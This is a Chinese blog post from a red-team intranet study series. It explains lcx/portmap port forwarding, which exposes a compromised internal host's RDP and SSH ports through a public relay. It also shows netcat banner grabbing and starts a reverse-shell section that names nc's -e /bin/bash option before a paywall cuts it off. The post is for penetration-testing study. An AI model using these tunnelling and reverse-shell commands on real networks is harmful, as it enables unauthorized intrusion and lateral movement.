【内网学习笔记】7、lcx、netcat和socat的使用

最新推荐文章于 2024-05-08 14:19:12 发布
最新推荐文章于 2024-05-08 14:19:12 发布
阅读量736 收藏 4
点赞数 1
分类专栏: 学习笔记 内网学习笔记 文章标签: 红队 内网安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37683287/article/details/117359889
版权
本文详细介绍了LCX、Netcat和Socat在内网安全中的应用,包括端口转发、反弹shell、文件操作和网络操作等。LCX用于Windows和Linux的端口映射,Netcat则用于获取banner信息和反弹shell,而Socat作为Netcat的加强版,支持更多高级功能如文件操作、NAT映射等。这些工具在红队行动和网络安全中具有重要作用。
摘要由CSDN通过智能技术生成

1、lcx 使用

lcx 分为 Windows 版和 Linux 版,Linux 版叫 portmap

Windows

  • 内网端口转发
内网失陷主机
lcx.exe -slave rhost rport lhost lport

公网代理主机
lcx.exe -listen lport1 lport2

内网失陷主机
lcx.exe -slave 123.123.123.123 4444 127.0.0.1 3389

公网代理主机
lcx.exe -listen 4444 5555

在建立连接后,访问公网代理主机的 5555 端口就能访问到内网失陷主机的 3389 端口了。

  • 本地端口映射

如果目标主机不能出网,这时可以利用内网中能够出网的主机,将其不能出网的主机端口映射到自身上,再借助端口转发到公网进行访问。

lcx.exe -tran 53 <目标主机 IP 地址> 3389

Linux

  • 内网端口转发
内网失陷主机
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 <公网主机 IP> -p2 4444

公网代理主机
./portmap -m 2 -p1 4444 -h2 <公网主机 IP> -p2 5555

此时访问公网主机 IP 的 5555 端口,就会访问到内网失陷主机的 22 端口了。

2、netcat 使用

nc 下载地址:https://eternallybored.org/misc/netcat/

nc 全称 netcat,它的功能很多,这里简单记录下两个常用的功能,其他的比如文件传输、端口扫描等等的就不介绍了,毕竟平时使用频率有一说一还是比较少的。

-l 开启监听状态
-v 显示详细信息
-p 指定监听的本地端口
-k 客户端断掉连接时,服务端依然保持运行
-e 将传入的信息以命令执行
-n 直接使用 IP 地址,不进行 dns 解析过程

获取 banner 信息

个人觉着最常用的功能,这个不仅可以用来查看 banner 信息,还能用来判断端口是否开放。

nc -vv rhost rport

> nc -v 172.16.214.43 22
Connection to 172.16.214.43 port 22 [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_8.4p1 Debian-3

反弹shell

个人觉着这个也是最常用的功能,可以使用 -e 指定 /bin/bash 进行反弹,也可以直接 -c 指定 bash 或者 cmd

-e 指定反弹 shell

最低0.47元/天 解锁文章
TeamsSix
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
socatWindows下的使用
无心的博客
09-27 6511
目录 0x01 socat的简介 0x02 socat进行文件传输 0x03 socat正向端口转发 0x04 socat反向端口转发 注: 边界机器 win08 192.168.222.175 内网机器 win7 192.168.222.137 0x01 socat的简介 socat是一个多功能的网络工具,名字来由是” Socket CAT”,可以看作是netcat的N倍加强版,其原版本是基于L...
socat-1.7.3.0-windows
02-28
socat 被称为是NC的plus,plus版,号称NC的最强的衍生版本。socat是一款双向数据流通道工具。具有许多强大的功能:端口的连接、端口侦听、收发文件、传递shell、端口转发、端口扫描等 此为2018年二月最新Windows版本,下载解压即用,Windows10 64位测试通过 官方网站:http://www.dest-unreach.org/socat/ 文档:http://www.dest-unreach.org/socat/doc/socat.html#EXAMPLES
windows 下的socat工具
07-25
Windows下的端口映射和转发工具。支持TCP/UDP协议。
Windows+Linux的虚拟串口工具
最新发布
驯龙高手_追风的博客
05-08 885
Windows+Linux虚拟串口工具
Windows版的SOCAT!强大的端口转发工具
01-13
LINUX下最强端口转发工具!不只是转发,它还能CAT,不用为临时连接做端口映射!并且比端口映射更强大,支持IPV6 IPV4之间转发!这是WINDOWS下版本!对,你能在WINDOWS使用它!实测!
socat_v1.7.4.3_ForWindows.zip
06-27
Socat 1.7.4.3 For windows. 在win10 x64 (ver:Microsoft Windows [版本 10.0.19043.1645])测试通过
windows版本socat
04-11
socat是一个多功能的网络工具,名字来由是” Socket CAT”,可以看作是netcat的N倍加强版 socat的主要特点就是在两个数据流之间建立通道;且支持众多协议和链接方式:ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl,socket等 该资源为windows版本的socat 可在windows上直接运行
LCX内网转发工具LCX可转发
12-29
两个,一个免杀,一个不免,不是一个版本。自己测试。
易语言-端口转发工具源码 内网穿透,类似LCX
06-25
端口转发工具源码 内网穿透,类似LCX 最近在用云服务器写点东西,服务器的CPU有点吃不消,于是想到了使用云服务器作为跳板,转到家里的机子,但是天朝的忘了都是局域网... 于是写了这个小工具... 用法类似LCX,需要一台有...
lcx端口内网转发工具
07-14
lcx端口转发
socat1.7.2.1-windows.zip
05-22
socat是一个netcat(nc)的替代产品,可以称得上nc++。socat的特点就是在两个流之间建立一个双向的 通道。socat的地址类型很多,有ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl,等等。 socat 官方文档 http://www.dest-unreach.org/socat/doc/socat.html#EXAMPLES socat LINUX版本下载 http://www.dest-unreach.org/socat/
socat-2.0.0-b8-windows:适用于XP或更高版本的Socat 2.0.0-b8
05-18
由于没有其他人为Windows编译过socat,因此就在这里。 我使用了一些优化方法,这应该可以使此版本的socat与众不同。 这些优化是-march = i586 -flto -fomit-frame-pointer 我不想太疯狂,因为这有时会导致奇怪的问题。
socat-windows:socat http的非官方Windows构建
06-03
socat-windows socat 的非官方构建 用 cygwin 构建 socat -V 的输出 socat by Gerhard Rieger - see www.dest-unreach.org socat version 1.7.2.1 on May 16 2012 00:59:02 running on CYGWIN_NT-6.1-WOW64 version 2012-05-09 10:25, release 1.7.15(0.260 /5/3), machine i686 features: #define WITH_STDIO 1 #define WITH_FDNUM 1 #define WITH_FILE 1 #define WITH_CREAT 1 #define WITH_GOPEN 1 #define WITH_TERMIOS
socat-1.7.3.2
05-18
socat,是linux下的一个工具,其功能与有“瑞士军刀”之称的netcat类似,不过据说可以看做netcat的加强版。的确如此,它有一些netcat所不具备却又很有需求的功能,例如ssl连接这种。nc可能是因为比较久没有维护,确实显得有些陈旧了。
socat中转工具
02-23
socat做数据流量中转,与iptables的forward功能有的一拼,但socat更方便,稳定性更高
伊顿LCX水冷变频器使用手册(英文版)
03-21
介绍了关于伊顿LCX水冷变频器使用手册(英文版)的详细说明,提供变频器的技术资料的下载。
内网端口映射工具 lcx
06-30
lcx.exe -slave 219.135.10.7 51 127.0.0.1 3389 命令的意思是把服务器上的3389端口的连接数据转发到远程主机的51端口 lcx.exe -listen 51 2007 命令的意思是本地接收51端口的数据转发到2007端口 远程主机处于内网...
windows 下的 socat 工具下载地址和使用
热门推荐
duanlove(技术路途)专栏
06-05 1万+
下载说明: http://tctianchi.yo2.cn/articles/windows%E4%B8%8B%E7%9A%84udp-to-tcp-forward.html 下载地址:http://www.nikhef.nl/~janjust/socat/socat-1.6.0.1-cygwin.bin.tar.gz socat 和其dll:http://olds.blogcn
socat安装
w3045872817的博客
10-14 1万+
socat的主要特点就是在两个数据流之间建立通道;且支持众多协议和链接方式:ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl,socket等。 socat是一个多功能的网络工具,名字来由是” Socket CAT”,可以看作是netcat的N 倍加强版,socat的官方网站:http://www.dest-unreach.or
内网转发技术:LCX与NC的使用详解
"内网转发姿势 - 作者:未知,主要介绍了LCX工具的使用以及nc命令进行内网转发和反弹CMD Shell的方法。" 本文详细讲述了两种常见的内网穿透技术,一种是使用LCX工具,另一种是利用nc命令。这两种方法在网络安全、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值